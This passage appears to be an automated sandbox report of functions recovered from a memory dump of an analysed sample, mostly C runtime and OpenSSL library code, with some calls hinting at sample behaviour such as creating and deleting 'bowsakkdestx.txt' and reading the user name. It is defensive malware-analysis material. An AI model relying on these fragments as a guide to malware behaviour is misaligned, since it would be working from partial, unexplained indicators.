Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00417C6A
_memmove.LIBCMT ref: 00417CD4

Strings

invalid string position, xrefs: 00417D2C
string too long, xrefs: 00417D36

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00414160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004141E4
_memmove.LIBCMT ref: 00414215

Strings

invalid string position, xrefs: 00414260
string too long, xrefs: 00414256

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00425341 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsnlen.LIBCMT ref: 00425354

Strings

U, xrefs: 0042535D

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD

Uniqueness

Uniqueness Score: -1.00%

Function 0045AD50 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045AD72
_memset.LIBCMT ref: 0045AE15

Strings

C7F, xrefs: 0045AD51, 0045AD56, 0045AD69, 0045AE0B, 0045AE14
.\crypto\buffer\buffer.c, xrefs: 0045AD8B, 0045ADBE, 0045ADD0, 0045ADE7

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$C7F
API String ID: 2102423945-2013712220
Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 0040C5DA
UuidToStringA.RPCRT4(?,?), ref: 0040C5F6
RpcStringFreeA.RPCRT4(?), ref: 0040C640

Strings

8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: StringUuid$CreateFree
String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
API String ID: 3044360575-2335240114
Opcode ID: 53fc3c065d0e8b0e2f31cfd9f57fb8964cc6021a1f44e389dc0f4568f1ff543f
Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
Opcode Fuzzy Hash: 53fc3c065d0e8b0e2f31cfd9f57fb8964cc6021a1f44e389dc0f4568f1ff543f
Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9

Strings

bowsakkdestx.txt, xrefs: 0040C49D

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Path$AppendFolder
String ID: bowsakkdestx.txt
API String ID: 29327785-2616962270
Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5

Uniqueness

Uniqueness Score: -1.00%

Function 0041BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
RegisterClassExW.USER32(00000030), ref: 0041BA73

Strings

LPCWSTRszWindowClass, xrefs: 0041BA65
0, xrefs: 0041BA1D

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: ClassCursorLoadRegister
String ID: 0$LPCWSTRszWindowClass
API String ID: 1693014935-1496217519
Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
DeleteFileA.KERNEL32(?), ref: 0040C45B

Strings

bowsakkdestx.txt, xrefs: 0040C442

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Path$AppendDeleteFileFolder
String ID: bowsakkdestx.txt
API String ID: 610490371-2616962270
Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55

Uniqueness

Uniqueness Score: -1.00%

Function 00419E70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00419EB8
_memset.LIBCMT ref: 00419EC9
_memset.LIBCMT ref: 00419EDA

Strings

p2Q, xrefs: 00419EE2

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD

Uniqueness

Uniqueness Score: -1.00%

Function 0040ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0040ED66
_memmove.LIBCMT ref: 0040EE25

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memmove_strtok
String ID:
API String ID: 3446180046-0
Opcode ID: 1ea6c2ed77aaebd064ac4c854667bd221886e94a905e9a380bb7db6a3f50af9b
Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
Opcode Fuzzy Hash: 1ea6c2ed77aaebd064ac4c854667bd221886e94a905e9a380bb7db6a3f50af9b
Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042218E
__read_nolock.LIBCMT ref: 0042225E
__filbuf.LIBCMT ref: 00422281
_memset.LIBCMT ref: 004222C5

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
__isleadbyte_l.LIBCMT ref: 0043C6DB
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
CloseHandle.KERNEL32(00000000), ref: 0040F1A8

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWritelstrlen
String ID:
API String ID: 1421093161-0
Opcode ID: b3abc9572091bca9125f21951a8d684c8c7a697cb0b84fa965d2ba6b520d2649
Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
Opcode Fuzzy Hash: b3abc9572091bca9125f21951a8d684c8c7a697cb0b84fa965d2ba6b520d2649
Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004C7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 004C70AB

Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9

_UnwindNestedFrames.LIBCMT ref: 004C70C2
___FrameUnwindToState.LIBCMT ref: 004C70D4
CallCatchBlock.LIBCMT ref: 004C70F8

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004253B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015

__calloc_crt.LIBCMT ref: 00425A01

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__lock.LIBCMT ref: 00425A37
___addlocaleref.LIBCMT ref: 00425A43
__lock.LIBCMT ref: 00425A57

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
String ID:
API String ID: 2580527540-0
Opcode ID: 624a80bb64221498bcc97e4ce1df031399a8d60bf113d3201ef3e9277dc7c2ac
Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
Opcode Fuzzy Hash: 624a80bb64221498bcc97e4ce1df031399a8d60bf113d3201ef3e9277dc7c2ac
Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 004409DD

Part of subcall function 004410FD: __fltout2.LIBCMT ref: 00441126

__cftog_l.LIBCMT ref: 00440A03
__cftoe_l.LIBCMT ref: 00440A35

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85

Uniqueness

Uniqueness Score: -1.00%

Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 004127B9
_malloc.LIBCMT ref: 004127C3

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00660000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 004127CE
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
Opcode Fuzzy Hash: d807541a0d1b126bc38ced4668b3b61b472b47aa0d79cc9e7bfc34870b6aacc2
Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9

Uniqueness

Uniqueness Score: -1.00%

Function 00412800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00412806
_malloc.LIBCMT ref: 00412814

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00660000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 0041281F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
Opcode Fuzzy Hash: 5d53f8f732e4342f1a2ab947ea56d6b713f7325b43ea2b5621e341dec89f9ad8
Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4

Uniqueness

Uniqueness Score: -1.00%

Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004149F1

Strings

invalid string position, xrefs: 00414C3D
string too long, xrefs: 00414C33

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00470040 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00470118
_memset.LIBCMT ref: 00470199

Strings

.\crypto\asn1\tasn_new.c, xrefs: 004700F9, 0047017A, 00470202, 00470228

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\asn1\tasn_new.c
API String ID: 2102423945-2878120539
Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A

Uniqueness

Uniqueness Score: -1.00%

Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00417E2E

Strings

invalid string position, xrefs: 00417EDF
string too long, xrefs: 00417EE9

Memory Dump Source

Source File: 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2608679572.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2608679572.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_958B.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA

